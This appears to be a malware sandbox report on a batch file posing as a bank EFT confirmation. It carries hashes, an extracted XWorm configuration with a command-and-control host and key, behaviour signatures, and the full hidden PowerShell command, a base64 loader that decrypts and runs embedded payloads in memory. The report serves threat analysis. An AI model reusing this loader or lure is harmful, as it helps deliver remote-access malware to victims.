Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2025, 00:35
Static task
static1
Behavioral task
behavioral1
Sample
Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
Resource
win7-20240903-en
General
-
Target
Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat
-
Size
62KB
-
MD5
4e49fd9891d84a4dff53559ce3fb1e4c
-
SHA1
6b44eb8513213887a7cf7a21a2ef75472fb32bcf
-
SHA256
6036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
-
SHA512
feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626
-
SSDEEP
1536:5ImZkbmEKUgXEXzICKUnFCtb4+tD3Ezpaljp228c+:5I3Hfctb4UD3EzpVBc+
Malware Config
Extracted
xworm
5.0
xinclas.vmcentra.top:2829
DX77uB6mg61Bv7eW
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2772-21-0x0000016E64200000-0x0000016E6420E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 15 IoCs
flow pid Process 22 2772 powershell.exe 28 2772 powershell.exe 31 2772 powershell.exe 54 2772 powershell.exe 56 2772 powershell.exe 57 2772 powershell.exe 62 2772 powershell.exe 67 2772 powershell.exe 70 2772 powershell.exe 71 2772 powershell.exe 72 2772 powershell.exe 73 2772 powershell.exe 74 2772 powershell.exe 75 2772 powershell.exe 76 2772 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2772 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c3c73813.cmd powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c3c73813.cmd powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2772 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2772 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1704 wrote to memory of 3908 1704 cmd.exe 89 PID 1704 wrote to memory of 3908 1704 cmd.exe 89 PID 3908 wrote to memory of 2772 3908 cmd.exe 91 PID 3908 wrote to memory of 2772 3908 cmd.exe 91
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Confirmation copy for EFT#_20250228_BOA_NY_E-SWFT050AX52951MX-US.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('JHVzZXJOYW1lID0gJGVudjpVU0VSTkFNRTskZ2tveXQgPSAiQzpcVXNlcnNcJHVzZXJOYW1lXGR3bS5iYXQiO2lmIChUZXN0LVBhdGggJGdrb3l0KSB7ICAgIFdyaXRlLUhvc3QgIkJhdGNoIGZpbGUgZm91bmQ6ICRna295dCIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAkZmlsZUxpbmVzID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbExpbmVzKCRna295dCwgW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOCk7ICAgIGZvcmVhY2ggKCRsaW5lIGluICRmaWxlTGluZXMpIHsgICAgICAgIGlmICgkbGluZSAtbWF0Y2ggJ146OjogPyguKykkJykgeyAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRldGVjdGVkIGluIHRoZSBiYXRjaCBmaWxlLiIgLUZvcmVncm91bmRDb2xvciBDeWFuOyAgICAgICAgICAgIHRyeSB7ICAgICAgICAgICAgICAgICRkZWNvZGVkQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRtYXRjaGVzWzFdLlRyaW0oKSk7ICAgICAgICAgICAgICAgICRpbmplY3Rpb25Db2RlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRTdHJpbmcoJGRlY29kZWRCeXRlcyk7ICAgICAgICAgICAgICAgIFdyaXRlLUhvc3QgIkluamVjdGlvbiBjb2RlIGRlY29kZWQgc3VjY2Vzc2Z1bGx5LiIgLUZvcmVncm91bmRDb2xvciBHcmVlbjsgICAgICAgICAgICAgICAgV3JpdGUtSG9zdCAiRXhlY3V0aW5nIGluamVjdGlvbiBjb2RlLi4uIiAtRm9yZWdyb3VuZENvbG9yIFllbGxvdzsgICAgICAgICAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gJGluamVjdGlvbkNvZGU7ICAgICAgICAgICAgICAgIGJyZWFrOyAgICAgICAgICAgIH0gY2F0Y2ggeyAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICJFcnJvciBkdXJpbmcgZGVjb2Rpbmcgb3IgZXhlY3V0aW5nIGluamVjdGlvbiBjb2RlOiAkXyIgLUZvcmVncm91bmRDb2xvciBSZWQ7ICAgICAgICAgICAgfTsgICAgICAgIH07ICAgIH07fSBlbHNlIHsgICAgICBXcml0ZS1Ib3N0ICJTeXN0ZW0gRXJyb3I6IEJhdGNoIGZpbGUgbm90IGZvdW5kOiAkZ2tveXQiIC1Gb3JlZ3JvdW5kQ29sb3IgUmVkOyAgICBleGl0O307ZnVuY3Rpb24gZGl1bnooJHBhcmFtX3Zhcil7CSRhZXNfdmFyPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkFlc106OkNyZWF0ZSgpOwkkYWVzX3Zhci5Nb2RlPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNpcGhlck1vZGVdOjpDQkM7CSRhZXNfdmFyLlBhZGRpbmc9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUGFkZGluZ01vZGVdOjpQS0NTNzsJJGFlc192YXIuS2V5PVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ2xMYlE3dHpsWjVlRE4wNlpIQzVkTVJpYXFLcnc0dTU5bGhoTTh2cDlZRGc9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ0hpY09vTElUU3hiVDB6aUlXK2JOUWc9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaHV4bW4oJHBhcmFtX3Zhcil7CSR0c3ZicT1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW0oLCRwYXJhbV92YXIpOwkkcXB5bHY9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtOwkkcWt0d3Q9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uR1ppcFN0cmVhbSgkdHN2YnEsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsJJHFrdHd0LkNvcHlUbygkcXB5bHYpOwkkcWt0d3QuRGlzcG9zZSgpOwkkdHN2YnEuRGlzcG9zZSgpOwkkcXB5bHYuRGlzcG9zZSgpOwkkcXB5bHYuVG9BcnJheSgpO31mdW5jdGlvbiB1b2dlZSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJJHZycG9sPVtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OignZGFvTCdbLTEuLi00XSAtam9pbiAnJykoW2J5dGVbXV0kcGFyYW1fdmFyKTsJJGRrcnluPSR2cnBvbC5FbnRyeVBvaW50OwkkZGtyeW4uSW52b2tlKCRudWxsLCAkcGFyYW0yX3Zhcik7fSRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJGdrb3l0OyR6b2J2aD1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJGdrb3l0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkbnZmIGluICR6b2J2aCkgewlpZiAoJG52Zi5TdGFydHNXaXRoKCc6OiAnKSkJewkJJHducXNhPSRudmYuU3Vic3RyaW5nKDMpOwkJYnJlYWs7CX19JGl4bXd2PVtzdHJpbmdbXV0kd25xc2EuU3BsaXQoJ1wnKTskdXl4ZHE9aHV4bW4gKGRpdW56IChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGl4bXd2WzBdKSkpOyR4eGp4aD1odXhtbiAoZGl1bnogKFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaXhtd3ZbMV0pKSk7dW9nZWUgJHV5eGRxICRudWxsO3VvZ2VlICR4eGp4aCAoLFtzdHJpbmdbXV0gKCclKicpKTs=')) | Invoke-Expression"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
62KB
MD54e49fd9891d84a4dff53559ce3fb1e4c
SHA16b44eb8513213887a7cf7a21a2ef75472fb32bcf
SHA2566036593430cc74f68abc87c13469083968dc94f011d12c50c845c1a44751e409
SHA512feced2549a5da4ab69077b37a9cbf88824edc010cd8163025556c8c0c810b7599c1f982556bc613fa1cceee6467f2d89ad72ae467346546e4f848a4b62db2626